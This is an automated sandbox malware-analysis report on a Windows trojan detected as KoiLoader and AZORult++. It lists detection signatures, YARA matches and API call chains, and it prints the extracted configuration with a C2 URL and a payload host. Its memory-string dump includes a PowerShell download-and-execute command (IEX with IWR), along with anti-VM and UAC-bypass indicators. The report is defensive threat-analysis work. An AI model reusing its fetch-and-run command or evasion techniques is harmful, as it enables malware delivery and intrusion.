Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
www.italialife24.it.exe

Overview

General Information

Sample name:www.italialife24.it.exe
Analysis ID:1567207
MD5:0f744f4aaa3157117ed49660ff19c0be
SHA1:0ca55d4cc76e0aeb2049d72fd7e088812e8913d6
SHA256:bcf349409a0111d7179994c408f6d02d325fb64647d56d5bd158aadfc0a88211
Tags:exewww-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

AZORult++, KoiLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • www.italialife24.it.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\www.italialife24.it.exe" MD5: 0F744F4AAA3157117ED49660FF19C0BE)
  • cleanup
{"C2": "http://195.123.217.43/oversate.php", "Payload url": "https://www.italialife24.it/wp-content/uploads/2021/05"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Process Memory Space: www.italialife24.it.exe PID: 7400JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.www.italialife24.it.exe.7617d0.2.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              0.2.www.italialife24.it.exe.7617d0.2.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.www.italialife24.it.exe.600000.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
                  0.2.www.italialife24.it.exe.600000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.2.www.italialife24.it.exe.600000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1848:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x9bf6:$s1: CoGetObject
                    Click to see the 3 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: www.italialife24.it.exeAvira: detected
                    Source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://195.123.217.43/oversate.php", "Payload url": "https://www.italialife24.it/wp-content/uploads/2021/05"}
                    Source: www.italialife24.it.exeReversingLabs: Detection: 63%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: www.italialife24.it.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00608710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_00608710
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006093A0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_006093A0

                    Exploits

                    barindex
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.7617d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: www.italialife24.it.exe PID: 7400, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00607300 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,0_2_00607300

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeUnpacked PE file: 0.2.www.italialife24.it.exe.600000.1.unpack
                    Source: www.italialife24.it.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: www.italialife24.it.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004B993E
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://195.123.217.43/oversate.php
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00606850 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00606850
                    Source: www.italialife24.it.exeString found in binary or memory: http://195.123.217.43/oversate.php
                    Source: www.italialife24.it.exe, 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.123.217.43/oversate.php%temp%
                    Source: www.italialife24.it.exeString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05
                    Source: www.italialife24.it.exe, 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/c

                    E-Banking Fraud

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00609240 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_00609240

                    System Summary

                    barindex
                    Source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00605C90 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00605C90
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00605FF0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_00605FF0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004BFBC10_2_004BFBC1
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00607C300_2_00607C30
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006026D00_2_006026D0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006077300_2_00607730
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006043F00_2_006043F0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006047F00_2_006047F0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: String function: 004B50E0 appears 33 times
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: String function: 004B3CE0 appears 82 times
                    Source: www.italialife24.it.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00606390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00606390
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00606C80 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_00606C80
                    Source: www.italialife24.it.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: www.italialife24.it.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeSection loaded: uxtheme.dllJump to behavior
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: www.italialife24.it.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: www.italialife24.it.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: www.italialife24.it.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: www.italialife24.it.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: www.italialife24.it.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: www.italialife24.it.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: www.italialife24.it.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeUnpacked PE file: 0.2.www.italialife24.it.exe.600000.1.unpack
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.7617d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: www.italialife24.it.exe PID: 7400, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_004B1300
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004C02D1 push ecx; ret 0_2_004C02E4

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_006089F0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-11363
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-11544
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeAPI coverage: 9.8 %
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004B993E
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
                    Source: www.italialife24.it.exeBinary or memory string: Hyper-V
                    Source: www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|eP8Tk5K9Start%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.43/oversate.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.italialife24.it/wp-content/uploads/2021/05/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
                    Source: www.italialife24.it.exeBinary or memory string: VMWare
                    Source: www.italialife24.it.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
                    Source: www.italialife24.it.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeAPI call chain: ExitProcess graph end nodegraph_0-11462
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeAPI call chain: ExitProcess graph end nodegraph_0-11680
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B76CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B76CB
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_004B1300
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B1710 mov ecx, dword ptr fs:[00000030h]0_2_004B1710
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00607940 mov eax, dword ptr fs:[00000030h]0_2_00607940
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00605FF0 mov eax, dword ptr fs:[00000030h]0_2_00605FF0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004BB779 GetProcessHeap,0_2_004BB779
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B5016 SetUnhandledExceptionFilter,0_2_004B5016
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B49BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004B49BE
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B76CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B76CB
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B4E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B4E89

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_00605C90 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00605C90
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe0_2_006094A0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_006094A0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_006094A0
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B5125 cpuid 0_2_004B5125
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_004B4D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004B4D70
                    Source: C:\Users\user\Desktop\www.italialife24.it.exeCode function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
